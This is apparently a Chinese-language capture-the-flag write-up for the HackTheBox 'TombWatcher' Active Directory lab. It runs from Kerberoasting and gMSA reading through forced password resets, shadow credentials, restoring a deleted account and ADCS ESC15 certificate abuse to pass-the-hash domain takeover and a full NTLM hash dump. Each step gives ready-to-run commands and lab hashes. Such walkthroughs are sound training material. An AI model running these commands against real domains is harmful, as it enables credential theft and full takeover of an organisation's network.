基本信息

1
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

端口扫描

80和常规域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
$ nmap -sC -sV -Pn 10.10.11.72
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 13:33 JST
Nmap scan report for 10.10.11.72
Host is up (0.20s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-11 08:13:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-11T08:15:20+00:00; +3h38m13s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-11T08:15:21+00:00; +3h38m13s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-11T08:15:20+00:00; +3h38m13s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-11T08:15:21+00:00; +3h38m13s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h38m12s, deviation: 0s, median: 3h38m12s
| smb2-time:
|   date: 2025-06-11T08:14:41
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.67 seconds

80

直接访问是IIS默认页面,先放着:

bloodhound

因为已经给出了一组账号密码,就添加hosts后常规bloodhound以及提取用户名:

1
2
3
bloodhound-python -u Henry -p 'H3nry_987TGV!' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip

netexec smb 10.10.11.72 -u 'henry' -p 'H3nry_987TGV!' --rid-brute | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

可以看到henry对alfred有WriteSPN:

users.txt

1
2
3
4
5
6
7
8
9
Administrator
Guest
krbtgt
DC01$
Henry
Alfred
sam
john
ansible_dev$

henry to alfred

有WriteSPN,很明显就是写入SPN后打Kerberoasting,得到的hash破解出Alfred密码:

1
2
3
4
5
6
7
faketime "$(curl -sik http://10.10.11.72:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

python3 targetedKerberoast.py -d tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!' --request-user Alfred --dc-ip 10.10.11.72

sudo john hash.txt -w /usr/share/wordlists/rockyou.txt

basketball

hash.txt

1
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$1b556634a1f0c4e8a23392f78e362ee2$ce4a99ef5d300e1e5a03296a621d23ca7eb078dd37f362de3fa086a174ec928d24471171b1730f29db97a660e921b55fcd13332d7d877de9548530449d0ad0a7a9729356cfe0fc2bfc9c73c81eb9e1db3889c27cb1802291f361fb7d6a4a4d4796fd3c3f93af50a8a0d680f5e235889c306d60d3980fb01369c154b4f53906205f19d330820377139742766db3b45a40c516b448f8c42860b77e6264090d62f699ad8f7f65ae72409dc804e7e80d309afb4298f326cc23870d9d4ff847880224d0045a744ea9f5aae9a5dba777498cce72a3631f80a716368033fa4b72b46878cd923d5b67a7a7943cbf1e861a717be5106871e5cecbe1a20ab36a5db692e85a46a099079db426bcd904bea67e655054ae2bd120d4e078902639ec89059458d2b9ece58b409271bab5a99aecf4c0588ff484c51768781dd527aef04c5621f4bf81d672f1ba000a0f6efd8cfeb2a5b7eb8e09a047c7d4422e69406b0bd5e861a96b1a895a20c3e8bfb859cfbcbb9a290e412ca70089776cf3e87fab779d1c37ef254b89906a400d6df6e5e0aa34f26efd4509bc7db6af42ce98739dca8c26ae02854e976a166b4a14f9e22e681ecbc3b09a835aa51e638f61330e77205c6b4411f1b87262e6367f7e5c166d8ca9302bcdbbccdeec887884cb10faad3f6e595bf2fb7110a119dbdd74406c3b4f982413921aa45b599031c378334012d63d6dc47d635eec194bcfe6d15a170fa0c78be2a48f5fba58b67c52ed3894a9594d2b8fe57713ef940ff563e1899e6e10c509d87e67a5fc89ee3cac5314d8d65173e10003dcdadfb493e07ba52111dcae06220933971de91a1650c82dd33047cea901b1483411e34f333238951e4a6023d57ea320ef334ad2210f53ebe76592ed3bfca02da4d8cad78e42ac2ea8b00e1d772b590022f5d93290134655cbd8d7d9099931bcc7a5111ddad684a804e147422a9fed7f729d09908c6bc9952963ad1e6caa8f8c2358fdd9ec094cddc1c58bb8cca8c1b4886d8093dd8433ba2fdc59d71329cc3e3046bd7d62b4e8aabcfca290b281d91028d8ceedc99c8d5cc745ed44c2a869f4f4b2dbbd492d4638bb19b13c6ba9fe5bceabfc1fa1e8a4b2abd5d8dcccdf843a92f8e82c536f97d945c03f59566e8c272a852e49b26944f9d10802200d7239d7898e43f4aa5486c4aa6a84567703128271cadd1ca32a31dd83bce0eb13875c1fd7ded64a58483045ad64fd0f63efaf5cb8837529e6b7c5f6e2360dc864f6259c3ee68e0bb2f7ba26613c2b02422a3bb0ef03194a724f8d5e6a86057745ff0090e7a468e017303ca46a08bc6dd48246333f1e11fbe6a1c200932d7cf67cffb917cd09e2aff0accfdc2a3b3525480817f28b43a8578c3ab2425542879a8b85f9565965f0e8c850ffa6f4222435c48ae11e80e32034e59d26ef37ecf5d146c5f58af80705a899dcd3d2a23005bcd88d36220d4daddf64

alfred to ansible_dev$

alfred不能登录,但对INFRASTRUCTURE组有AddSelf权限,INFRASTRUCTURE组又有GMSA权限:

所以就是先利用AddSelf添加自己到INFRASTRUCTURE,然后读GMSA,得到ansible_dev$:

1
2
3
4
5
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u alfred  -p basketball add groupMember 'CN=INFRASTRUCTURE,CN=USERS,DC=TOMBWATCHER,DC=HTB' 'CN=ALFRED,CN=USERS,DC=TOMBWATCHER,DC=HTB'

nxc ldap 10.10.11.72 -u alfred -p 'basketball' --gmsa

Account: ansible_dev$         NTLM: 1c37d00093dc2a5f25176bf2d474afdc     PrincipalsAllowedToReadPassword: Infrastructure

ansible_dev$ to SAM

ansible_dev$对SAM又有ForceChangePassword,所以就是直接改密码:

1
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'ANSIBLE_DEV$' -p ':1c37d00093dc2a5f25176bf2d474afdc' set password 'SAM' 'Passw@rd'

sam to john

sam又对john有WriteOwner,所以修改owner后修改权限再修改密码,或者shadow creds获取John hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 修改owner
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u sam -p 'Passw@rd' set owner john sam

# 修改权限
bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Passw@rd' add genericAll "john" "sam"

# shadow creds
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'sam' -p 'Passw@rd' add shadowCredentials john

python3 PKINITtools/gettgtpkinit.py -cert-pem PrV3BYhu_cert.pem -key-pem PrV3BYhu_priv.pem tombwatcher.htb/john PrV3BYhu.ccache

export KRB5CCNAME=PrV3BYhu.ccache
python3 PKINITtools/getnthash.py tombwatcher.htb/john -key 670ceb494e639e93c5765259c0f98434344cb4885c34aebe93c0ccff620b0b23

Recovered NT Hash
ad9324754583e3e42b55aad4d3b8d2bf

user flag

john登录得到user.txt:

ADCS

john对ADCS有GenericAll,但ADCS下没有任何用户,是被删除了(这里应该是别人已经恢复了,所以bloodhound数据里有cert_admin用户):

检查deleted object可以看到cert_admin相关的:

1
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

所以就是恢复这个被删除的用户,再利用GenericAll:

1
2
3
Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'
Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Passw@rd" -Force)
Enable-ADAccount -Identity cert_admin

ESC15

cert_admin用户并不能登录,但因为是ADCS相关,常规certipy发现ESC15:

1
certipy-ad find -u cert_admin -p 'Passw@rd' -stdout -vulnerable -dc-ip 10.10.11.72

所以就是利用ESC15,得到administrator:

(场景2,类似ESC3)

1
2
3
4
5
6
7
certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Passw@rd' -application-policies "1.3.6.1.4.1.311.20.2.1" -ca tombwatcher-CA-1 -template WebServer -dc-ip 10.10.11.72

certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Passw@rd' -on-behalf-of TOMBWATCHER\\Administrator -template User -ca tombwatcher-CA-1 -pfx cert_admin.pfx -dc-ip 10.10.11.72

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.72

[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc

root flag

administrator 登录:

1
evil-winrm -i 10.10.11.72 -u Administrator -H f61db423bebe3328d33af26741afe5fc

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
impacket-secretsdump Administrator@10.10.11.72 -hashes :f61db423bebe3328d33af26741afe5fc -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:964accf7288128f78f8638bbc42f6456:::
Henry:1103:aad3b435b51404eeaad3b435b51404ee:2f3b5dd61cd9784435ee12a93c93fa6c:::
Alfred:1104:aad3b435b51404eeaad3b435b51404ee:cf5fd610b326e61f175e3a9bac4751f9:::
sam:1105:aad3b435b51404eeaad3b435b51404ee:01794af19fd00af4f2528923c4ef08be:::
john:1106:aad3b435b51404eeaad3b435b51404ee:ad9324754583e3e42b55aad4d3b8d2bf:::
cert_admin:1111:aad3b435b51404eeaad3b435b51404ee:01794af19fd00af4f2528923c4ef08be:::
jack:7601:aad3b435b51404eeaad3b435b51404ee:5243097f144b10181c469f4052ab3edb:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:ca045fb171f8b565d6e772b0a75c6f5f:::
ansible_dev$:1108:aad3b435b51404eeaad3b435b51404ee:1c37d00093dc2a5f25176bf2d474afdc:::

参考资料